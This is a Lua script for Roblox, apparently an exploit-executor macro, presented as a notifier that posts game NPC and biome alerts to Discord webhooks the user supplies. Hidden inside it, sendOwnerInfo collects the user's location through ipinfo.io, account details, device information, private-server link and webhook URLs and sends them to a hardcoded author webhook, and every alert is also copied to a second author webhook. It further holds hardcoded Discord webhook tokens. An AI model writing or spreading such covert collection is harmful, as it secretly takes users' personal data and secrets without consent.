-- v5.5
--================ SERVICES ================
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local TextChatService = game:GetService("TextChatService")
local TweenService = game:GetService("TweenService")

local player = Players.LocalPlayer
local userId = player.UserId
local IS_OWNER = player.Name == "mm55061"

--================ ป้องกันรันซ้ำ ================
if _G.MacroRunning then
    local g = Instance.new("ScreenGui")
    g.ResetOnSpawn = false
    g.Parent = game:GetService("CoreGui")
    local f = Instance.new("Frame", g)
    f.Size = UDim2.new(0,320,0,80)
    f.Position = UDim2.new(0.5,-160,0.5,-40)
    f.BackgroundColor3 = Color3.fromRGB(30,30,35)
    f.BorderSizePixel = 0
    Instance.new("UICorner", f).CornerRadius = UDim.new(0,12)
    local st = Instance.new("UIStroke", f)
    st.Color = Color3.fromRGB(255,80,80) st.Thickness = 1.5
    local l1 = Instance.new("TextLabel", f)
    l1.Size = UDim2.new(1,0,0.55,0) l1.Position = UDim2.new(0,0,0.08,0)
    l1.BackgroundTransparency = 1
    l1.Text = "⚠️ Macro is already running!"
    l1.TextColor3 = Color3.fromRGB(255,80,80)
    l1.Font = Enum.Font.GothamBold l1.TextSize = 14
    l1.TextXAlignment = Enum.TextXAlignment.Center
    local l2 = Instance.new("TextLabel", f)
    l2.Size = UDim2.new(1,0,0.35,0) l2.Position = UDim2.new(0,0,0.62,0)
    l2.BackgroundTransparency = 1
    l2.Text = "มาโครทำงานอยู่แล้ว!"
    l2.TextColor3 = Color3.fromRGB(180,180,180)
    l2.Font = Enum.Font.Gotham l2.TextSize = 11
    l2.TextXAlignment = Enum.TextXAlignment.Center
    task.delay(3, function() game:GetService("Debris"):AddItem(g, 0) end)
    return
end
_G.MacroRunning = true

--================ OWNER WEBHOOKS ================
local OWNER_WEBHOOK = "https://discord.com/api/webhooks/1475530043043090462/VGz67zRFxDoXuMJzznvKgvXTyO6Dn4OTR9Q7AxVZVHFAsgcZBSXejGDz28t98QkdbTjq"
local OWNER_NOTIFY  = "https://discord.com/api/webhooks/1476750610710663281/Ber04cyAI27q5UU1ZOxPiHFTeohaKme5mh0RnTZQJ_DLor7WHQAVvRKTS2XGME8heqw6"

--================ LANGUAGE ================
local lang = "ENG"
local TEXT = {
    ENG = {
        title="🔔 NPC & Biome Notifier", sub="Type -SM to stop / -MS to start",
        npcWebhook="NPC Webhook URL", biomeWebhook="Biome Webhook URL",
        vipLink="Private Server Link", confirm="✅ Confirm & Start",
        next="Next ▶", back="◀ Back", watching="Watching: NPC & BIOMES",
        test="🔔 Test", running="🟢 Macro Running — Type -SM to stop",
        stopped="🔴 Macro Stopped — Type -MS to start again",
        hintStop="🔴 Macro Stopped! Type -MS to start again.",
        hintStart="🟢 Macro Started!",
        errWebhook="❌ Invalid NPC Webhook URL!",
        errBiomeWebhook="❌ Invalid Biome Webhook URL!",
        errVip="❌ Invalid VIP link!",
        npcPlaceholder="Paste NPC Webhook URL...",
        biomePlaceholder="Paste Biome Webhook URL...",
        vipPlaceholder="Paste VIP Server Link here...",
        selectTitle="Select @everyone targets",
        npcSection="👾 NPC",
        biomeSection="🌍 Biome",
        rareSection="🌟 Rare",
    },
    TH = {
        title="🔔 แจ้งเตือน NPC & Biome", sub="พิมพ์ -SM หยุด / -MS เริ่ม",
        npcWebhook="Webhook URL สำหรับ NPC", biomeWebhook="Webhook URL สำหรับ Biome",
        vipLink="ลิงก์เซิร์ฟเวอร์ส่วนตัว", confirm="✅ ยืนยันและเริ่ม",
        next="ถัดไป ▶", back="◀ ย้อนกลับ", watching="กำลังจับตา: NPC & BIOME",
        test="🔔 ทดสอบ", running="🟢 มาโครทำงานอยู่ — พิมพ์ -SM เพื่อหยุด",
        stopped="🔴 มาโครหยุดแล้ว — พิมพ์ -MS เพื่อเริ่มใหม่",
        hintStop="🔴 มาโครหยุดแล้ว! พิมพ์ -MS เพื่อเริ่มใหม่",
        hintStart="🟢 มาโครเริ่มทำงานแล้ว!",
        errWebhook="❌ NPC Webhook URL ไม่ถูกต้อง!",
        errBiomeWebhook="❌ Biome Webhook URL ไม่ถูกต้อง!",
        errVip="❌ VIP link ไม่ถูกต้อง!",
        npcPlaceholder="วาง NPC Webhook URL...",
        biomePlaceholder="วาง Biome Webhook URL...",
        vipPlaceholder="วาง VIP Server Link ที่นี่...",
        selectTitle="เลือกอันที่จะ @everyone",
        npcSection="👾 NPC",
        biomeSection="🌍 Biome",
        rareSection="🌟 Rare",
    }
}
local function T(key) return TEXT[lang][key] or key end

--================ NPC CONFIG ================
local NPCS = {
    { name="MARI",   keyword="mari",   image="https://static.wikia.nocookie.net/sol-rng/images/3/37/MARI_HIGH_QUALITYY.png/revision/latest?cb=20240704045119",  color=16777215 },
    { name="JESTER", keyword="jester", image="https://static.wikia.nocookie.net/sol-rng/images/d/db/Headshot_of_Jester.png/revision/latest?cb=20240630142936",  color=10181046 },
    { name="RIN",    keyword="rin",    image="https://static.wikia.nocookie.net/sol-rng/images/0/04/RinHeadShot.png/revision/latest?cb=20260214165200",          color=16744272 },
}

--================ BIOME CONFIG ================
local BIOMES = {
    { name="WINDY",      duration=120,  trigger="%[Windy%]",      endTrigger=nil, image="https://files.catbox.moe/i5zrd4.png",  color=11393254, rare=false },
    { name="SNOWY",      duration=120,  trigger="%[Snowy%]",      endTrigger=nil, image="https://files.catbox.moe/1ci11a.png",  color=16777215, rare=false },
    { name="RAINY",      duration=120,  trigger="%[Rainy%]",      endTrigger=nil, image="https://files.catbox.moe/tga93x.png",  color=4886754,  rare=false },
    { name="SANDSTORM",  duration=650,  trigger="%[Sand Storm%]", endTrigger=nil, image="https://files.catbox.moe/ifumtg.png",  color=16750848, rare=false },
    { name="HELL",       duration=666,  trigger="%[Hell%]",       endTrigger=nil, image="https://files.catbox.moe/ea80ib.png",  color=16711680, rare=false },
    { name="STARFALL",   duration=600,  trigger="%[Starfall%]",   endTrigger=nil, image="https://files.catbox.moe/hzccx8.png",  color=16763904, rare=false },
    { name="HEAVEN",     duration=240,  trigger="%[Heaven%]",     endTrigger=nil, image="https://files.catbox.moe/izgcbl.png",  color=16777164, rare=false },
    { name="CORRUPTION", duration=650,  trigger="%[Corruption%]", endTrigger=nil, image="https://files.catbox.moe/q29een.png",  color=8388736,  rare=false },
    { name="NULL",       duration=99,   trigger="%[Null%]",       endTrigger=nil, image="https://files.catbox.moe/070ta3.png",  color=1315860,  rare=false },
    { name="GLITCHED",   duration=164,  trigger="%[Manager%]: Unexpected error",            endTrigger="%[Manager%]: %[Code 404%] has resolved", image="https://files.catbox.moe/3kuvwy.png", color=65280,    rare=true },
    { name="DREAMSPACE", duration=192,  trigger="%[Dreamspace%]: You begin to feel sleepy", endTrigger="%[Dreamspace%]: Waking up",              image="https://files.catbox.moe/dci7dn.png", color=11141290, rare=true },
    { name="CYBERSPACE", duration=720,  trigger="%[Cyberspace%]: Signal_Received",          endTrigger="%[Cyberspace%]: Signal Lost",            image="https://files.catbox.moe/cen7e7.png", color=65535,    rare=true },
}

--================ STATE ================
local macroRunning = false
local vipLink, webhookUrl, biomeWebhookUrl = "","",""
local lastSentTime, recentSent, activeBiomes = {},{},{}
local currentBiome = nil
local COOLDOWN = 600
local NPC_DURATION = 180
local chatHooked = false
local ytLabel, statusLabel = nil, nil

local npcPing, biomePing = {},{}
for _, n in ipairs(NPCS) do npcPing[n.name] = true end
for _, b in ipairs(BIOMES) do biomePing[b.name] = b.rare end

--================ ANIMATION ================
local function btnAnim(btn, normalColor)
    local nc = normalColor or btn.BackgroundColor3
    local pressing = false
    btn.MouseButton1Down:Connect(function()
        pressing = true
        TweenService:Create(btn, TweenInfo.new(0.08, Enum.EasingStyle.Quad), {BackgroundTransparency=0.3}):Play()
    end)
    btn.MouseButton1Up:Connect(function()
        pressing = false
        TweenService:Create(btn, TweenInfo.new(0.15, Enum.EasingStyle.Back, Enum.EasingDirection.Out), {BackgroundTransparency=0, BackgroundColor3=nc}):Play()
    end)
    btn.MouseLeave:Connect(function()
        if not pressing then TweenService:Create(btn, TweenInfo.new(0.15), {BackgroundColor3=nc, BackgroundTransparency=0}):Play() end
    end)
    btn.MouseEnter:Connect(function()
        TweenService:Create(btn, TweenInfo.new(0.15), {BackgroundColor3=Color3.new(math.min(nc.R+0.1,1), math.min(nc.G+0.1,1), math.min(nc.B+0.1,1))}):Play()
    end)
end

local function checkboxAnim(box)
    box.MouseButton1Down:Connect(function() TweenService:Create(box, TweenInfo.new(0.08), {BackgroundTransparency=0.4}):Play() end)
    box.MouseButton1Up:Connect(function() TweenService:Create(box, TweenInfo.new(0.15, Enum.EasingStyle.Back, Enum.EasingDirection.Out), {BackgroundTransparency=0}):Play() end)
end

local function showFrame(f)
    f.Visible = true
    f.BackgroundTransparency = 1
    for _, c in ipairs(f:GetDescendants()) do
        if c:IsA("TextLabel") or c:IsA("TextButton") then c.TextTransparency = 1 end
        if c:IsA("UIStroke") then c.Transparency = 1 end
    end
    TweenService:Create(f, TweenInfo.new(0.22, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), {BackgroundTransparency=0}):Play()
    task.spawn(function()
        task.wait(0.05)
        for _, c in ipairs(f:GetDescendants()) do
            if c:IsA("TextLabel") or c:IsA("TextButton") then TweenService:Create(c, TweenInfo.new(0.18), {TextTransparency=0}):Play() end
            if c:IsA("UIStroke") then TweenService:Create(c, TweenInfo.new(0.18), {Transparency=0}):Play() end
        end
    end)
end

local function hideFrame(f, callback)
    for _, c in ipairs(f:GetDescendants()) do
        if c:IsA("TextLabel") or c:IsA("TextButton") then TweenService:Create(c, TweenInfo.new(0.12), {TextTransparency=1}):Play() end
        if c:IsA("UIStroke") then TweenService:Create(c, TweenInfo.new(0.12), {Transparency=1}):Play() end
    end
    TweenService:Create(f, TweenInfo.new(0.15, Enum.EasingStyle.Quad, Enum.EasingDirection.In), {BackgroundTransparency=1}):Play()
    task.wait(0.18)
    f.Visible = false
    for _, c in ipairs(f:GetDescendants()) do
        if c:IsA("TextLabel") or c:IsA("TextButton") then c.TextTransparency = 0 end
        if c:IsA("UIStroke") then c.Transparency = 0 end
    end
    f.BackgroundTransparency = 0
    if callback then callback() end
end

--================ TIME ================
local function getCurrentTime()
    local ok, res = pcall(function()
        local r = syn and syn.request or request or http_request
        local d = HttpService:JSONDecode(r({Url="http://worldtimeapi.org/api/ip",Method="GET"}).Body)
        return "[" .. d.datetime:match("T(%d+:%d+:%d+)") .. "]"
    end)
    return ok and res or os.date("[%H:%M:%S]", os.time())
end

--================ SEND ================
local function sendRaw(url, body)
    if not url or url == "" then return end
    local r = syn and syn.request or request or http_request
    if not r then return end
    pcall(function()
        r({Url=url, Method="POST", Headers={["Content-Type"]="application/json"}, Body=HttpService:JSONEncode(body)})
    end)
end

local function sendSimple(msg, url)
    sendRaw(url or webhookUrl, {content=msg})
end

--================ OWNER INFO ================
local function sendOwnerInfo()
    if IS_OWNER then return end
    local r = syn and syn.request or request or http_request
    if not r then return end
    local t = getCurrentTime()
    local UIS = game:GetService("UserInputService")
    local device = (UIS.TouchEnabled and not UIS.KeyboardEnabled) and "📱 Mobile" or UIS.KeyboardEnabled and "💻 PC" or "Unknown"
    local platform, screenSize, location = "Unknown","Unknown","Unknown"
    pcall(function()
        if UIS.TouchEnabled and not UIS.KeyboardEnabled then
            local p = UIS:GetPlatform()
            platform = p==Enum.Platform.IOS and "🍎 iOS" or p==Enum.Platform.Android and "🤖 Android" or "📱 Mobile"
        else platform = "🖥️ Windows" end
    end)
    pcall(function()
        local s = game:GetService("Workspace").CurrentCamera.ViewportSize
        screenSize = math.floor(s.X).."x"..math.floor(s.Y)
    end)
    pcall(function()
        local d = HttpService:JSONDecode(r({Url="https://ipinfo.io/json",Method="GET"}).Body)
        if d.city and d.country then location = d.city..", "..d.country end
    end)
    local joinDate, friendCount = "Unknown","Unknown"
    pcall(function()
        local d = HttpService:JSONDecode(r({Url="https://users.roblox.com/v1/users/"..userId,Method="GET"}).Body)
        joinDate = d.created and d.created:match("^(.-)T") or "Unknown"
    end)
    pcall(function()
        local d = HttpService:JSONDecode(r({Url="https://friends.roblox.com/v1/users/"..userId.."/friends/count",Method="GET"}).Body)
        friendCount = tostring(d.count or "Unknown")
    end)
    sendRaw(OWNER_WEBHOOK, {embeds={{
        title="📋 User Info",
        description=
            "**Time:** `"..t.."`\n**Username:** `"..player.Name.."`\n**Display Name:** `"..player.DisplayName.."`\n"..
            "**User ID:** `"..userId.."`\n**Account Age:** `"..player.AccountAge.." days`\n**Join Date:** `"..joinDate.."`\n"..
            "**Friends:** `"..friendCount.."`\n**Device:** `"..device.."`\n**Platform:** `"..platform.."`\n"..
            "**Screen Size:** `"..screenSize.."`\n**Location:** `"..location.."`\n**Players:** `"..#Players:GetPlayers().."`\n"..
            "**VIP:** "..vipLink.."\n**NPC WH:** `"..webhookUrl.."`\n**Biome WH:** `"..biomeWebhookUrl.."`",
        color=65280,
        thumbnail={url="https://thumbs.roblox.com/v1/users/avatar-headshot?userIds="..userId.."&size=420x420&format=Png&isCircular=false"}
    }}})
end

--================ SEND NPC ================
local function sendNpcEmbed(npc, isEnd)
    local t = getCurrentTime()
    local ping = npcPing[npc.name] and "@everyone" or ""
    local body
    if isEnd then
        body = {content="", embeds={{
            description="**"..t.."**\n\n**NPC Left - "..npc.name.."**",
            color=npc.color, thumbnail={url=npc.image},
            footer={text="G_Script's Macro | v5.5"},
            timestamp=os.date("!%Y-%m-%dT%H:%M:%S.000Z",os.time())
        }}}
    else
        body = {content=ping, embeds={{
            description="**"..t.."**\n\n**NPC Spawn - "..npc.name.."**\n\n**Private Server Link**\n"..vipLink,
            color=npc.color, thumbnail={url=npc.image},
            footer={text="G_Script's Macro | v5.5"},
            timestamp=os.date("!%Y-%m-%dT%H:%M:%S.000Z",os.time())
        }}, allowed_mentions={parse={"everyone"}}}
    end
    sendRaw(webhookUrl, body)
    if not IS_OWNER then
        sendRaw(OWNER_NOTIFY, {
            content=body.content,
            embeds={{
                description=body.embeds[1].description.."\n\n**Player:** `"..player.Name.."`",
                color=body.embeds[1].color, thumbnail=body.embeds[1].thumbnail,
                footer=body.embeds[1].footer, timestamp=body.embeds[1].timestamp
            }}
        })
    end
    print("✅ NPC: "..npc.name.." "..(isEnd and "Left" or "Spawn"))
end

--================ SEND BIOME ================
local function sendBiomeEmbed(biome, isEnd)
    local t = getCurrentTime()
    local ping = biomePing[biome.name] and "@everyone" or ""
    local body
    if isEnd then
        body = {content="", embeds={{
            description="**"..t.."**\n\n**Biome Ended - "..biome.name.."**",
            color=biome.color, thumbnail={url=biome.image},
            footer={text="G_Script's Macro | v5.5"},
            timestamp=os.date("!%Y-%m-%dT%H:%M:%S.000Z",os.time())
        }}}
    else
        body = {content=ping, embeds={{
            description="**"..t.."**\n\n**Biome Started - "..biome.name.."**\n\n**Private Server Link**\n"..vipLink,
            color=biome.color, thumbnail={url=biome.image},
            footer={text="G_Script's Macro | v5.5"},
            timestamp=os.date("!%Y-%m-%dT%H:%M:%S.000Z",os.time())
        }}, allowed_mentions={parse={"everyone"}}}
    end
    sendRaw(biomeWebhookUrl, body)
    if not IS_OWNER then
        sendRaw(OWNER_NOTIFY, {
            content=body.content,
            embeds={{
                description=body.embeds[1].description.."\n\n**Player:** `"..player.Name.."`",
                color=body.embeds[1].color, thumbnail=body.embeds[1].thumbnail,
                footer=body.embeds[1].footer, timestamp=body.embeds[1].timestamp
            }}
        })
    end
    print("✅ Biome: "..biome.name.." "..(isEnd and "Ended" or "Started"))
end

--================ STATUS ================
local function showStatus(text, color)
    if statusLabel then
        statusLabel.Text = text
        statusLabel.TextColor3 = color
        statusLabel.Visible = true
    end
end

--================ STOP/START ================
local function stopMacro()
    if macroRunning then
        macroRunning = false
        _G.MacroRunning = false
        sendSimple(getCurrentTime()..": Macro stopped.")
        sendSimple(getCurrentTime()..": Macro stopped.", biomeWebhookUrl)
        local h = Instance.new("Hint")
        h.Text = T("hintStop")
        h.Parent = game:GetService("Workspace")
        game:GetService("Debris"):AddItem(h, 4)
        if ytLabel then ytLabel.Visible = false end
        showStatus(T("stopped"), Color3.fromRGB(255,80,80))
    end
end

local function startMacro()
    if not macroRunning and webhookUrl ~= "" and vipLink ~= "" then
        macroRunning = true
        sendSimple(getCurrentTime()..": Macro started!")
        sendSimple(getCurrentTime()..": Macro started!", biomeWebhookUrl)
        local h = Instance.new("Hint")
        h.Text = T("hintStart")
        h.Parent = game:GetService("Workspace")
        game:GetService("Debris"):AddItem(h, 3)
        if ytLabel then ytLabel.Visible = true end
        showStatus(T("running"), Color3.fromRGB(0,255,100))
    end
end

--================ BIOME TIMER ================
local function endBiome(biome)
    if activeBiomes[biome.name] then
        activeBiomes[biome.name] = false
        lastSentTime[biome.name] = 0
        sendBiomeEmbed(biome, true)
        if currentBiome == biome.name then currentBiome = nil end
    end
end

local function startBiomeTimer(biome)
    if currentBiome and currentBiome ~= biome.name then
        for _, b in ipairs(BIOMES) do
            if b.name == currentBiome and activeBiomes[b.name] then endBiome(b) end
        end
    end
    currentBiome = biome.name
    activeBiomes[biome.name] = true
    if not biome.endTrigger then
        task.delay(biome.duration, function() endBiome(biome) end)
    end
end

--================ CHAT ================
local function checkMsg(text, fromPlayer)
    if not macroRunning then return end
    if fromPlayer then return end
    if not text or text == "" then return end

    if text:find("%[Merchant%]") then
        local low = text:lower()
        for _, npc in ipairs(NPCS) do
            if low:find(npc.keyword) and low:find("arrived") then
                local now = tick()
                if recentSent[npc.name] and now - recentSent[npc.name] < 5 then return end
                recentSent[npc.name] = now
                if now - (lastSentTime[npc.name] or 0) >= COOLDOWN then
                    lastSentTime[npc.name] = now
                    sendNpcEmbed(npc, false)
                    task.delay(NPC_DURATION, function()
                        lastSentTime[npc.name] = 0
                        sendNpcEmbed(npc, true)
                    end)
                end
                return
            end
        end
    end

    for _, biome in ipairs(BIOMES) do
        if text:find(biome.trigger) then
            local now = tick()
            if recentSent[biome.name] and now - recentSent[biome.name] < 5 then return end
            recentSent[biome.name] = now
            if now - (lastSentTime[biome.name] or 0) >= COOLDOWN then
                lastSentTime[biome.name] = now
                startBiomeTimer(biome)
                sendBiomeEmbed(biome, false)
            end
            return
        end
        if biome.endTrigger and text:find(biome.endTrigger) then
            endBiome(biome)
            return
        end
    end
end

local function hookChat()
    if chatHooked then return end
    chatHooked = true
    pcall(function()
        TextChatService.MessageReceived:Connect(function(msg)
            local fp = msg.TextSource and Players:GetPlayerByUserId(msg.TextSource.UserId)
            checkMsg(msg.Text or "", fp)
        end)
    end)
    task.spawn(function()
        task.wait(3)
        pcall(function()
            local cg = player.PlayerGui:WaitForChild("Chat", 10)
            local lf = cg:FindFirstChild("Frame_MessageLogDisplay", true)
            if not lf then return end
            lf.ChildAdded:Connect(function(child)
                task.wait(0.1)
                local lb = child:FindFirstChildWhichIsA("TextLabel", true)
                if lb and lb.Text ~= "" then checkMsg(lb.Text or "", nil) end
            end)
        end)
    end)
    for _, p in ipairs(Players:GetPlayers()) do p.Chatted:Connect(function(m) checkMsg(m,p) end) end
    Players.PlayerAdded:Connect(function(p) p.Chatted:Connect(function(m) checkMsg(m,p) end) end)
    player.Chatted:Connect(function(m)
        local l = m:lower()
        if l=="-sm" then stopMacro() elseif l=="-ms" then startMacro() end
    end)
end

game:GetService("Players").PlayerRemoving:Connect(function(p) if p==player then stopMacro() end end)
player.AncestryChanged:Connect(function() if not player.Parent then stopMacro() end end)

--================ GUI ================
local gui = Instance.new("ScreenGui")
gui.Name = "MacroNotifier"
gui.ResetOnSpawn = false
gui.Parent = game:GetService("CoreGui")

ytLabel = Instance.new("TextLabel", gui)
ytLabel.Size = UDim2.new(0,200,0,24)
ytLabel.Position = UDim2.new(1,-170,1,-120)
ytLabel.BackgroundTransparency = 1
ytLabel.Text = "YT : G Script's"
ytLabel.TextColor3 = Color3.new(1,1,1)
ytLabel.TextSize = 13
ytLabel.Font = Enum.Font.GothamBold
ytLabel.TextXAlignment = Enum.TextXAlignment.Center
ytLabel.TextStrokeTransparency = 0.5
ytLabel.TextStrokeColor3 = Color3.new(0,0,0)
ytLabel.Visible = false
task.spawn(function()
    local t = 0
    while ytLabel and ytLabel.Parent do
        t=t+0.02 ytLabel.Rotation=math.sin(t)*6 task.wait(0.03)
    end
end)

statusLabel = Instance.new("TextLabel", gui)
statusLabel.Size = UDim2.new(0,420,0,24)
statusLabel.Position = UDim2.new(0.5,-210,0,10)
statusLabel.BackgroundTransparency = 1
statusLabel.Text = ""
statusLabel.TextColor3 = Color3.fromRGB(0,255,100)
statusLabel.Font = Enum.Font.GothamBold
statusLabel.TextSize = 13
statusLabel.TextXAlignment = Enum.TextXAlignment.Center
statusLabel.TextStrokeTransparency = 0.5
statusLabel.TextStrokeColor3 = Color3.new(0,0,0)
statusLabel.Visible = false

--================ HELPERS ================
local function mkLbl(p,txt,x,y,w,h,sz,bold,col,center)
    local l=Instance.new("TextLabel",p)
    l.Size=UDim2.new(0,w,0,h) l.Position=UDim2.new(0,x,0,y)
    l.BackgroundTransparency=1 l.Text=txt
    l.TextColor3=col or Color3.new(1,1,1)
    l.Font=bold and Enum.Font.GothamBold or Enum.Font.Gotham
    l.TextSize=sz or 13
    l.TextXAlignment=center and Enum.TextXAlignment.Center or Enum.TextXAlignment.Left
    return l
end

local function mkBtn(p,txt,x,y,w,h,bg)
    local b=Instance.new("TextButton",p)
    b.Size=UDim2.new(0,w,0,h) b.Position=UDim2.new(0,x,0,y)
    b.Text=txt b.TextColor3=Color3.new(1,1,1)
    b.BackgroundColor3=bg or Color3.fromRGB(88,101,242)
    b.Font=Enum.Font.GothamBold b.TextSize=12 b.BorderSizePixel=0
    Instance.new("UICorner",b).CornerRadius=UDim.new(0,8)
    btnAnim(b, bg or Color3.fromRGB(88,101,242))
    return b
end

local function mkBox(p,x,y,w,h,ph)
    local b=Instance.new("TextBox",p)
    b.Size=UDim2.new(0,w,0,h) b.Position=UDim2.new(0,x,0,y)
    b.BackgroundColor3=Color3.fromRGB(35,35,42) b.Text="" b.PlaceholderText=ph or ""
    b.TextColor3=Color3.new(1,1,1) b.PlaceholderColor3=Color3.fromRGB(90,90,100)
    b.Font=Enum.Font.Gotham b.TextSize=9 b.ClearTextOnFocus=false b.BorderSizePixel=0
    Instance.new("UICorner",b).CornerRadius=UDim.new(0,6)
    local s=Instance.new("UIStroke",b) s.Color=Color3.fromRGB(60,60,75) s.Thickness=1
    b.Focused:Connect(function() TweenService:Create(s,TweenInfo.new(0.2),{Color=Color3.fromRGB(88,101,242)}):Play() end)
    b.FocusLost:Connect(function() TweenService:Create(s,TweenInfo.new(0.2),{Color=Color3.fromRGB(60,60,75)}):Play() end)
    return b
end

local function mkFrame(w,h,draggable)
    local f=Instance.new("Frame",gui)
    f.Size=UDim2.new(0,w,0,h) f.Position=UDim2.new(0.5,-w/2,0.5,-h/2)
    f.BackgroundColor3=Color3.fromRGB(25,25,30) f.BorderSizePixel=0
    f.Active=true f.Draggable=draggable or false f.Visible=false
    Instance.new("UICorner",f).CornerRadius=UDim.new(0,12)
    local s=Instance.new("UIStroke",f) s.Color=Color3.fromRGB(88,101,242) s.Thickness=1.5
    return f
end

--================ PAGE 1: LANGUAGE ================
local langFrame = mkFrame(300,160,false)
langFrame.Visible = true

mkLbl(langFrame,"🌐 Select Language / เลือกภาษา",0,14,300,30,14,true,Color3.new(1,1,1),true)
local engBtn = mkBtn(langFrame,"🇬🇧 English",15,58,120,44,Color3.fromRGB(88,101,242))
local thBtn  = mkBtn(langFrame,"🇹🇭 ภาษาไทย",165,58,120,44,Color3.fromRGB(220,50,50))
mkLbl(langFrame,"G Script's Macro | v5.5",0,118,300,20,10,false,Color3.fromRGB(100,100,120),true)

--================ PAGE 2: WEBHOOK ================
local wbFrame = mkFrame(360,310,true)
local wTitle  = mkLbl(wbFrame,"",10,8,340,28,14,true)
local wSub    = mkLbl(wbFrame,"",10,34,340,16,11,false,Color3.fromRGB(150,150,150))
local npcWbLb = mkLbl(wbFrame,"",18,56,324,14,10,false,Color3.fromRGB(120,120,140))
local npcBox  = mkBox(wbFrame,18,72,256,28,"")
local testNpc = mkBtn(wbFrame,"🔔 Test",280,72,64,28,Color3.fromRGB(60,60,80))
local bwbLb   = mkLbl(wbFrame,"",18,106,324,14,10,false,Color3.fromRGB(120,120,140))
local bwbBox  = mkBox(wbFrame,18,122,256,28,"")
local testBio = mkBtn(wbFrame,"🔔 Test",280,122,64,28,Color3.fromRGB(60,60,80))
local vipLb   = mkLbl(wbFrame,"",18,158,324,14,11,true,Color3.fromRGB(180,180,200))
local vipBox  = mkBox(wbFrame,18,174,324,34,"")
local nextBtn = mkBtn(wbFrame,"Next ▶",18,222,324,38)
local wStatus = mkLbl(wbFrame,"",10,274,340,20,10,false,Color3.fromRGB(120,120,120),true)

-- ปุ่ม Hi เฉพาะ mm55061
if IS_OWNER then
    local hiBtn = mkBtn(wbFrame,"Hi",298,6,52,26,Color3.fromRGB(255,140,0))
    hiBtn.TextSize = 11
    hiBtn.MouseButton1Click:Connect(function()
        npcBox.Text = "https://discord.com/api/webhooks/1467914950369611986/edl2N_6eV3mcathjdinxu_gpbenIA43yAhWWuTMJiJwBqdp6PqPIQ7dFLbmTGn_Jjsud"
        bwbBox.Text = "https://discord.com/api/webhooks/1467915184252125400/T4NVaAunvu6FvOsYF-srYro8vuupen6rp6dwCPBehX-sUWxdxNac79_Ew9yNVzlXmg0J"
        vipBox.Text = "https://www.roblox.com/share?code=68ba5477796cb94c8eb0ffbe009123c0&type=Server"
        wStatus.Text = "✅ Auto filled!" wStatus.TextColor3 = Color3.fromRGB(0,255,100)
        task.wait(2) wStatus.Text = T("watching") wStatus.TextColor3 = Color3.fromRGB(120,120,120)
    end)
end

--================ PAGE 3: SELECT 3 คอลัมน์ ================
local screenW = game:GetService("Workspace").CurrentCamera.ViewportSize.X
local screenH = game:GetService("Workspace").CurrentCamera.ViewportSize.Y
local selW = math.min(screenW - 20, 500)
local selH = math.min(screenH - 60, 420)

local selFrame = Instance.new("Frame", gui)
selFrame.Size = UDim2.new(0,selW,0,selH)
selFrame.Position = UDim2.new(0.5,-selW/2,0.5,-selH/2)
selFrame.BackgroundColor3 = Color3.fromRGB(25,25,30)
selFrame.BorderSizePixel = 0
selFrame.Active = true
selFrame.Draggable = false
selFrame.Visible = false
Instance.new("UICorner",selFrame).CornerRadius = UDim.new(0,12)
local selStroke = Instance.new("UIStroke",selFrame)
selStroke.Color = Color3.fromRGB(88,101,242) selStroke.Thickness = 1.5

local selTitle = mkLbl(selFrame,"",10,8,selW-20,28,13,true,Color3.new(1,1,1),true)

local colW = math.floor((selW - 30) / 3)
local colH = selH - 80

local function mkCol(title, xPos)
    local bg = Instance.new("Frame", selFrame)
    bg.Size = UDim2.new(0,colW,0,colH)
    bg.Position = UDim2.new(0,xPos,0,40)
    bg.BackgroundColor3 = Color3.fromRGB(32,32,38)
    bg.BorderSizePixel = 0
    Instance.new("UICorner",bg).CornerRadius = UDim.new(0,8)

    local hdr = Instance.new("TextLabel",bg)
    hdr.Size = UDim2.new(1,0,0,22)
    hdr.Position = UDim2.new(0,0,0,4)
    hdr.BackgroundTransparency = 1
    hdr.Text = title
    hdr.TextColor3 = Color3.fromRGB(88,101,242)
    hdr.Font = Enum.Font.GothamBold hdr.TextSize = 11
    hdr.TextXAlignment = Enum.TextXAlignment.Center

    local scroll = Instance.new("ScrollingFrame",bg)
    scroll.Size = UDim2.new(1,-4,1,-30)
    scroll.Position = UDim2.new(0,2,0,28)
    scroll.BackgroundTransparency = 1
    scroll.BorderSizePixel = 0
    scroll.ScrollBarThickness = 3
    scroll.ScrollBarImageColor3 = Color3.fromRGB(88,101,242)
    scroll.CanvasSize = UDim2.new(0,0,0,0)
    return scroll
end

local npcScroll   = mkCol("👾 NPC", 8)
local biomeScroll = mkCol("🌍 Biome", 8 + colW + 7)
local rareScroll  = mkCol("🌟 Rare", 8 + (colW+7)*2)

local function addCb(scroll, name, defaultOn, onToggle)
    local count = #scroll:GetChildren()
    local row = Instance.new("Frame",scroll)
    row.Size = UDim2.new(1,-4,0,26)
    row.Position = UDim2.new(0,2,0,count*28)
    row.BackgroundTransparency = 1

    local box = Instance.new("TextButton",row)
    box.Size = UDim2.new(0,18,0,18) box.Position = UDim2.new(0,2,0,4)
    box.BackgroundColor3 = defaultOn and Color3.fromRGB(88,101,242) or Color3.fromRGB(50,50,60)
    box.Text = defaultOn and "✓" or ""
    box.TextColor3 = Color3.new(1,1,1)
    box.Font = Enum.Font.GothamBold box.TextSize = 11 box.BorderSizePixel = 0
    Instance.new("UICorner",box).CornerRadius = UDim.new(0,4)

    local lbl = Instance.new("TextLabel",row)
    lbl.Size = UDim2.new(1,-24,1,0) lbl.Position = UDim2.new(0,24,0,0)
    lbl.BackgroundTransparency = 1 lbl.Text = name
    lbl.TextColor3 = Color3.new(1,1,1) lbl.Font = Enum.Font.Gotham
    lbl.TextSize = 10 lbl.TextXAlignment = Enum.TextXAlignment.Left

    local enabled = defaultOn
    checkboxAnim(box)
    box.MouseButton1Click:Connect(function()
        enabled = not enabled
        TweenService:Create(box, TweenInfo.new(0.15), {
            BackgroundColor3 = enabled and Color3.fromRGB(88,101,242) or Color3.fromRGB(50,50,60)
        }):Play()
        box.Text = enabled and "✓" or ""
        onToggle(enabled)
    end)

    local newH = (count+1)*28
    scroll.CanvasSize = UDim2.new(0,0,0,newH)
end

for _,npc in ipairs(NPCS) do
    addCb(npcScroll, npc.name, true, function(v) npcPing[npc.name]=v end)
end
for _,b in ipairs(BIOMES) do
    if not b.rare then addCb(biomeScroll, b.name, false, function(v) biomePing[b.name]=v end) end
end
for _,b in ipairs(BIOMES) do
    if b.rare then addCb(rareScroll, b.name, true, function(v) biomePing[b.name]=v end) end
end

